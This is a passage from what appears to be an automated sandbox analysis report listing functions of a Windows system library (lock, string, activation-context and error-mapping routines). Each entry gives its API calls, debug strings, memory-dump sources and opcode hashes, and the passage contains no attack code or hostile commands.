                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveFreeHeapLockRelease_wcsicmp$AcquireActivationContext
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 176173115-0
                                                                                                                            • Opcode ID: 6e2d0fc23eeea0415fa6378c990b04acd106523d4f0bbb319d459a134995f6cc
                                                                                                                            • Instruction ID: 2f0d48ae94c7fb54b6ac6a4a8f11337909288c3a6bc09164586dbe0af958b9ca
                                                                                                                            • Opcode Fuzzy Hash: 6e2d0fc23eeea0415fa6378c990b04acd106523d4f0bbb319d459a134995f6cc
                                                                                                                            • Instruction Fuzzy Hash: 5E813D32E10A09AFCB54CF6DC484A99B7F2FF85715F10816DE419DB694E738AA43CB60
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D7220, Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __isascii.1105(0000000A,?), ref: 6B1D7275
                                                                                                                            • isdigit.1105(00000000,?), ref: 6B1D7283
                                                                                                                            • __isascii.1105(0000000A,?), ref: 6B232467
                                                                                                                            • isdigit.1105(00000000,?), ref: 6B232475
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: __isasciiisdigit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2481201981-0
                                                                                                                            • Opcode ID: ac721fc87cbd4170e78f410d8deeaad9c66201c61b14b6aaae6949d9841b4bc8
                                                                                                                            • Instruction ID: a98acc1f71f34221932c22c5cbe9f1f28a7dd9002518f1e64c2d8525a06f96b4
                                                                                                                            • Opcode Fuzzy Hash: ac721fc87cbd4170e78f410d8deeaad9c66201c61b14b6aaae6949d9841b4bc8
                                                                                                                            • Instruction Fuzzy Hash: A87128B1E0426F9BDB04CAA8C9906BEB7F1AF46341F6045ABE555E72C4D73CC941C7A0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1EF820, Relevance: 12.1, APIs: 8, Instructions: 137COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • memcmp.1105(00000030,6B1B5138,00000010,00000000,00000001,-00000001), ref: 6B1EF84C
                                                                                                                            • RtlAcquireSRWLockExclusive.1105(00000024,00000000,00000000,00000000,00000001,-00000001), ref: 6B1EF883
                                                                                                                            • RtlAcquireSRWLockExclusive.1105(6B2C86AC,00000024,00000000,00000000,00000000,00000001,-00000001), ref: 6B1EF8C6
                                                                                                                              • Part of subcall function 6B204D3B: memset.1105(?,00000000,000000A0,00000000,00000000,00000024), ref: 6B204D77
                                                                                                                              • Part of subcall function 6B204D3B: RtlRunOnceExecuteOnce.1105(6B2C86B0,6B205690,00000000,00000000,00000000,00000000,00000024), ref: 6B204D9E
                                                                                                                              • Part of subcall function 6B204D3B: ZwTraceControl.1105(0000000F,?,000000A0,?,000000A0,?,00000000,00000000,00000024), ref: 6B204DE9
                                                                                                                              • Part of subcall function 6B204D3B: memcmp.1105(00000000,6B1B5138,00000010,0000000F,?,000000A0,?,000000A0,?,00000000,00000000,00000024), ref: 6B204E26
                                                                                                                            • RtlRbInsertNodeEx.1105(6B2C86DC,?,00000000,00000000), ref: 6B1EF931
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(6B2C86AC,6B2C86DC,?,00000000,00000000), ref: 6B1EF93B
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(00000024,6B2C86AC,6B2C86DC,?,00000000,00000000), ref: 6B1EF94F
                                                                                                                              • Part of subcall function 6B20BC2C: RtlAcquireSRWLockExclusive.1105(?,00000030,00000000,-00000001,6B1EF875,00000000,00000000,00000000,00000001,-00000001), ref: 6B20BC79
                                                                                                                              • Part of subcall function 6B20BC2C: RtlReleaseSRWLockExclusive.1105(?,?,00000030,00000000,-00000001,6B1EF875,00000000,00000000,00000000,00000001,-00000001), ref: 6B20BC8D
                                                                                                                              • Part of subcall function 6B20BC2C: RtlAllocateHeap.1105(?,00000008,000000D0,?,?,00000030,00000000,-00000001,6B1EF875,00000000,00000000,00000000,00000001,-00000001), ref: 6B20BCA6
                                                                                                                            • RtlSetLastWin32Error.1105(00000057,00000000,00000001,-00000001), ref: 6B1EF996
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(00000024,0000000A,00000024,00000000,00000000,00000000,00000001,-00000001), ref: 6B23BD78
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$Release$Acquire$Oncememcmp$AllocateControlErrorExecuteHeapInsertLastNodeTraceWin32memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3014906823-0
                                                                                                                            • Opcode ID: b10bdfd93c3a21f9456f03af6a1002c46c88161a83d5e1a64f9a4e0df17a9f3a
                                                                                                                            • Instruction ID: a5763d31c247dd67b8f67a00f0e9bb48704123c315049084c2935f739cdce1ae
                                                                                                                            • Opcode Fuzzy Hash: b10bdfd93c3a21f9456f03af6a1002c46c88161a83d5e1a64f9a4e0df17a9f3a
                                                                                                                            • Instruction Fuzzy Hash: 69412771504B0ABBE711CF34E890B6BB7E4AF85709F014529FCA48A284DB3CD506CBB2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D5C07, Relevance: 11.0, APIs: 1, Strings: 5, Instructions: 452COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _wcsnicmp.1105(?,xl--,00000004,?,?,?,?), ref: 6B1D5CC7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcsnicmp
                                                                                                                            • String ID: $$$$H$xl--$xn--
                                                                                                                            • API String ID: 1886669725-662589111
                                                                                                                            • Opcode ID: ab5477651c8a7a019ad4a7fa310bfd9b649592b077a502b24b15bde277cecfcb
                                                                                                                            • Instruction ID: 3ad8048dd4ce85ab5ce0f30fb84488042e59d265e6a205d3023b14cf85e18304
                                                                                                                            • Opcode Fuzzy Hash: ab5477651c8a7a019ad4a7fa310bfd9b649592b077a502b24b15bde277cecfcb
                                                                                                                            • Instruction Fuzzy Hash: C7F1B471E0462A9BDB14CF6CC4846DDB7F1EF44315F2481AADA51EB284EB389982CB61
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1F74C0, Relevance: 10.8, APIs: 7, Instructions: 264COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlEqualUnicodeString.1105(?,6B1B1040,00000001,?,00000024,01000000), ref: 6B1F769A
                                                                                                                            • RtlEqualUnicodeString.1105(?,6B1B1050,00000001,?,6B1B1040,00000001,?,00000024,01000000), ref: 6B1F76AE
                                                                                                                            • RtlEqualUnicodeString.1105(?,6B1B1048,00000001,?,6B1B1050,00000001,?,6B1B1040,00000001,?,00000024,01000000), ref: 6B1F76C2
                                                                                                                            • RtlEqualUnicodeString.1105(?,6B1B1058,00000001,?,6B1B1048,00000001,?,6B1B1050,00000001,?,6B1B1040,00000001,?,00000024,01000000), ref: 6B1F76D6
                                                                                                                            • RtlEqualUnicodeString.1105(000FFFF0,6B1B1060,00000001,6B1B1068,00000001,6B1B18F8,00000001), ref: 6B1F7700
                                                                                                                            • iswdigit.1105(000E6B1B,6B1B1048,00000001,?,6B1B1050,00000001,?,6B1B1040,00000001,?,00000024,01000000), ref: 6B1F771D
                                                                                                                            • RtlEqualUnicodeString.1105(00100000,6B1B18F8,00000001), ref: 6B23F9B0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: EqualStringUnicode$iswdigit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3246613909-0
                                                                                                                            • Opcode ID: 3c70487533950fe2b51f7048eb1b6af73869391ef8de5b1f74ddf67df06dd047
                                                                                                                            • Instruction ID: 281ed3479e1d23cc100dda814a079e4ab6d9b15caf616e1e10dca6f11a11ce07
                                                                                                                            • Opcode Fuzzy Hash: 3c70487533950fe2b51f7048eb1b6af73869391ef8de5b1f74ddf67df06dd047
                                                                                                                            • Instruction Fuzzy Hash: 6081787181422576EF20DE98C4A1BFDB3FEAF26712F6109ABE464D7190E73D8487C291
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D0B60, Relevance: 10.7, APIs: 7, Instructions: 234COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlIpv6StringToAddressW.1105(?,?,00000000,00000000), ref: 6B1D0BAA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressIpv6String
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 27538981-0
                                                                                                                            • Opcode ID: b690b3803644220c55924738faed87d42b98be9f139281c8459cf90186e800ac
                                                                                                                            • Instruction ID: 927f5b078add253d7618c62db194fd6b5aff2b2800935f013dc15100a74199d5
                                                                                                                            • Opcode Fuzzy Hash: b690b3803644220c55924738faed87d42b98be9f139281c8459cf90186e800ac
                                                                                                                            • Instruction Fuzzy Hash: 16615B7AE4860AABEB34DA74CC91BBE73F2DF25729F15426AE454D72C0E73C8540C650
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D8D29, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 200COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • memcpy.1105(-00000030,?,00000000,?,00000000,?,?,6B2217F0,00000000,?,00000000,?), ref: 6B1D8E86
                                                                                                                            • memcpy.1105(-00000030,?,?,?,00000000,?,?,6B2217F0,00000000,?,00000000,?), ref: 6B1D8EBF
                                                                                                                            Strings
                                                                                                                            • SXS: %s() found activation context data at %p with assembly roster that has no root, xrefs: 6B233491
                                                                                                                            • RtlpQueryInformationActivationContextDetailedInformation, xrefs: 6B23348C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: memcpy
                                                                                                                            • String ID: RtlpQueryInformationActivationContextDetailedInformation$SXS: %s() found activation context data at %p with assembly roster that has no root
                                                                                                                            • API String ID: 3510742995-1732449319
                                                                                                                            • Opcode ID: be8dd0e6486bb94f588744cd0c5ee081369c832ba19e92b7f6b7d554eddd6fcb
                                                                                                                            • Instruction ID: 8ebf3e42cfcc658eca04f77627e111f72c37aeb9b76b2faaac3e69c42bb886a5
                                                                                                                            • Opcode Fuzzy Hash: be8dd0e6486bb94f588744cd0c5ee081369c832ba19e92b7f6b7d554eddd6fcb
                                                                                                                            • Instruction Fuzzy Hash: 14713EB5A00219EFDB05CF58C881A9AB7F5FF58314F254199E818DB341D335EA92CF94
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1F20A0, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 199COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlRaiseException.1105(?), ref: 6B23D009
                                                                                                                            • RtlRaiseException.1105(C0150010), ref: 6B23D07A
                                                                                                                            • DbgPrintEx.1105(00000033,00000002,SXS: %s() Active frame is not the frame being deactivated %p != %p,RtlDeactivateActivationContextUnsafeFast,?,0000002C,?,00000000,000000FF), ref: 6B23D127
                                                                                                                            • RtlRaiseException.1105(C0150010), ref: 6B23D1C7
                                                                                                                            Strings
                                                                                                                            • SXS: %s() Active frame is not the frame being deactivated %p != %p, xrefs: 6B23D116
                                                                                                                            • RtlDeactivateActivationContextUnsafeFast, xrefs: 6B23D111
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionRaise$Print
                                                                                                                            • String ID: RtlDeactivateActivationContextUnsafeFast$SXS: %s() Active frame is not the frame being deactivated %p != %p
                                                                                                                            • API String ID: 3901562751-4142264681
                                                                                                                            • Opcode ID: 370dacfb877f6bd40cc5e66db01aba3e30c9f7ff4940bbf29fb408dc4caa45da
                                                                                                                            • Instruction ID: 16bcf2c7b262eb4aadb9470f0397d18ae299dd025640541166960458140e5c0f
                                                                                                                            • Opcode Fuzzy Hash: 370dacfb877f6bd40cc5e66db01aba3e30c9f7ff4940bbf29fb408dc4caa45da
                                                                                                                            • Instruction Fuzzy Hash: A08147B094831ADFD300CF19C480B0AFBE4BF89789F104A5EF5999B290D379D586CB96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1EA500, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 172COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlValidSid.1105(00000050,?), ref: 6B1EA523
                                                                                                                            • wcscpy_s.1105(?,00000100,S-1-,?,00000050,?), ref: 6B1EA54A
                                                                                                                              • Part of subcall function 6B1EA6C0: memcpy.1105(00000000,?,?,?,00000050,?,00000000), ref: 6B1EA781
                                                                                                                            • memcpy.1105(?,?,00000000,00000000,000000FC,?,?,00000050,?), ref: 6B1EA663
                                                                                                                            • RtlCreateUnicodeString.1105(?,?,00000000,000000FC,?,?,00000050,?), ref: 6B1EA6A3
                                                                                                                            • wcscat_s.1105(?,00000100,6B1C292C,?,00000050,?), ref: 6B23A2DB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: memcpy$CreateStringUnicodeValidwcscat_swcscpy_s
                                                                                                                            • String ID: S-1-
                                                                                                                            • API String ID: 1445283056-1273753892
                                                                                                                            • Opcode ID: ee139562a18a3909411e2a2578b841dca1cc156a321664d42e2c140affac13f2
                                                                                                                            • Instruction ID: 35838b9224f1bcdf65ffe389993f475858f86e208f5aeca1c9b042aad0c85e06
                                                                                                                            • Opcode Fuzzy Hash: ee139562a18a3909411e2a2578b841dca1cc156a321664d42e2c140affac13f2
                                                                                                                            • Instruction Fuzzy Hash: 00511AB1D045696ADB24CB38CC547B9F7F4AF0A301F0641A6D569D7180E33C9A95CBF1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1DCCC0, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 134COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • DbgPrint.1105(RTL: RtlNtStatusToDosError(0x%lx): No Valid Win32 Error Mapping,?,?,?,-00000F38,00000000,?,?), ref: 6B234E05
                                                                                                                            • DbgPrint.1105(RTL: Edit ntos\rtl\generr.c to correct the problem,?,?,?,-00000F38,00000000,?,?), ref: 6B234E0F
                                                                                                                            • DbgPrint.1105(RTL: ERROR_MR_MID_NOT_FOUND is being returned,?,-00000F38,00000000,?,?), ref: 6B234E1C
                                                                                                                            Strings
                                                                                                                            • RTL: RtlNtStatusToDosError(0x%lx): No Valid Win32 Error Mapping, xrefs: 6B234E00
                                                                                                                            • RTL: ERROR_MR_MID_NOT_FOUND is being returned, xrefs: 6B234E17
                                                                                                                            • RTL: Edit ntos\rtl\generr.c to correct the problem, xrefs: 6B234E0A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Print
                                                                                                                            • String ID: RTL: ERROR_MR_MID_NOT_FOUND is being returned$RTL: Edit ntos\rtl\generr.c to correct the problem$RTL: RtlNtStatusToDosError(0x%lx): No Valid Win32 Error Mapping
                                                                                                                            • API String ID: 3558298466-1070408152
                                                                                                                            • Opcode ID: 46bf7553fcffe2a9ad98783c9d05a41476b60277281ce94ff9eef23ad4b90133
                                                                                                                            • Instruction ID: 18d521ba6347827940b5504b2dff996aa6db0f16350c7cea70b565085315f8f0
                                                                                                                            • Opcode Fuzzy Hash: 46bf7553fcffe2a9ad98783c9d05a41476b60277281ce94ff9eef23ad4b90133
                                                                                                                            • Instruction Fuzzy Hash: 6D4126B6A44619ABE714CF58E890BBAB7A1E795711F00067EE515C37C0DB3E9850C2E1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B20645B, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 109timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • memset.1105(?,00000000,00000030,?,00000000,00000000), ref: 6B206490
                                                                                                                            • RtlDebugPrintTimes.1105(?,00000030,00000030,00000030), ref: 6B20651A
                                                                                                                            • RtlAcquireSRWLockExclusive.1105(?,?,00000000,00000000), ref: 6B206553
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(?,?,?,00000000,00000000), ref: 6B206588
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$AcquireDebugPrintReleaseTimesmemset
                                                                                                                            • String ID: 0$0
                                                                                                                            • API String ID: 3207447552-203156872
                                                                                                                            • Opcode ID: 3961f9a3cd536acfa063202d02e571779bede30a63f8171dff660fa1661a7b4b
                                                                                                                            • Instruction ID: ad2d96e378ace7138a80f029d80c43027f6590a4f5eaadcf5929340a8a476dd0
                                                                                                                            • Opcode Fuzzy Hash: 3961f9a3cd536acfa063202d02e571779bede30a63f8171dff660fa1661a7b4b
                                                                                                                            • Instruction Fuzzy Hash: 7C416DB160874A9FC341CF28C484A1BBBE4BB89718F00466EF588DB340D775EA45CB96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D4510, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 84COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • DbgPrint.1105(RTL: RtlNtStatusToDosError(0x%lx): No Valid Win32 Error Mapping,?,?,?,00000000,?,6B243AE2,C000000D,?,?,?,00000000,?,00000000,?,?), ref: 6B2308F2
                                                                                                                            • DbgPrint.1105(RTL: Edit ntos\rtl\generr.c to correct the problem,RTL: RtlNtStatusToDosError(0x%lx): No Valid Win32 Error Mapping,?,?,?,00000000,?,6B243AE2,C000000D,?,?,?,00000000,?,00000000,?), ref: 6B2308FC
                                                                                                                            • DbgPrint.1105(RTL: ERROR_MR_MID_NOT_FOUND is being returned,?,?,?,00000000,?,00000000,?,?,?,00000000,?,00000000,?), ref: 6B230909
                                                                                                                            Strings
                                                                                                                            • RTL: RtlNtStatusToDosError(0x%lx): No Valid Win32 Error Mapping, xrefs: 6B2308ED
                                                                                                                            • RTL: ERROR_MR_MID_NOT_FOUND is being returned, xrefs: 6B230904
                                                                                                                            • RTL: Edit ntos\rtl\generr.c to correct the problem, xrefs: 6B2308F7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Print
                                                                                                                            • String ID: RTL: ERROR_MR_MID_NOT_FOUND is being returned$RTL: Edit ntos\rtl\generr.c to correct the problem$RTL: RtlNtStatusToDosError(0x%lx): No Valid Win32 Error Mapping
                                                                                                                            • API String ID: 3558298466-1070408152
                                                                                                                            • Opcode ID: f25dca56291aca1c4461ef12408eebba00b45895790e17ff1b13190d599704c1
                                                                                                                            • Instruction ID: a129176c9b5ce883d9ddcc96d8ddbd0e58dbab7e4ca2cb99ff8abfa586821082
                                                                                                                            • Opcode Fuzzy Hash: f25dca56291aca1c4461ef12408eebba00b45895790e17ff1b13190d599704c1
                                                                                                                            • Instruction Fuzzy Hash: C2216773A2422BBAF714576D9891BBA7392D747741F01022AE611C62D4DA2DE990C2B2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1EA8C0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlGetNtSystemRoot.1105(?,?), ref: 6B1EA8F0
                                                                                                                            • RtlAppendUnicodeToString.1105(02140000,00000000,?,?), ref: 6B1EA8FD
                                                                                                                              • Part of subcall function 6B1EA990: memmove.1105(00000000,00000050,00000052,?,?,00000000,?,?,6B1EA448,?,\REGISTRY\USER\,?,02000000,?,?,000000FA), ref: 6B1EA9E2
                                                                                                                            • RtlAppendUnicodeToString.1105(02140000,\SysWOW64,02140000,00000000,?,?), ref: 6B1EA915
                                                                                                                            • RtlPrefixUnicodeString.1105(02140000,?,00000001,02140000,\SysWOW64,02140000,00000000,?,?), ref: 6B1EA924
                                                                                                                            • RtlReplaceSystemDirectoryInPath.1105(02140000,0000014C,00000001,00000000,02140000,?,00000001,02140000,\SysWOW64,02140000,00000000,?,?), ref: 6B1EA975
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: StringUnicode$AppendSystem$DirectoryPathPrefixReplaceRootmemmove
                                                                                                                            • String ID: \SysWOW64
                                                                                                                            • API String ID: 1880611629-3584015931
                                                                                                                            • Opcode ID: e4002bf632bcd0af3b782857450e4c3e3eae390d72be30c76e6bcf49158545f1
                                                                                                                            • Instruction ID: 776a5aa6f1cac15bf0c776647f1d70c0bc3d402c280436f5e5253b7af58c6c60
                                                                                                                            • Opcode Fuzzy Hash: e4002bf632bcd0af3b782857450e4c3e3eae390d72be30c76e6bcf49158545f1
                                                                                                                            • Instruction Fuzzy Hash: 02113DB190122CB6CB20DFB4EC49BCEB3F8AF48714F1141D6E509A7240DB34AA85CFA4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B29D8DF, Relevance: 9.2, APIs: 6, Instructions: 160timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAcquireSRWLockShared.1105(?,000000FE,?,?,?,?,6B29C9F8,000000FE), ref: 6B29D9D0
                                                                                                                            • RtlAcquireSRWLockExclusive.1105(?,000000FE,?,?,?), ref: 6B29D9E6
                                                                                                                            • RtlDebugPrintTimes.1105(?,?,?,000000FE,?,?,?,?,6B29C9F8,000000FE), ref: 6B29DA0E
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(?,000000FE,?,?,?), ref: 6B29DA6A
                                                                                                                            • RtlReleaseSRWLockShared.1105(?,000000FE,?,?,?), ref: 6B29DA71
                                                                                                                            • RtlReleaseSRWLockShared.1105(?,000000FE,?,?,?), ref: 6B29DA83
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
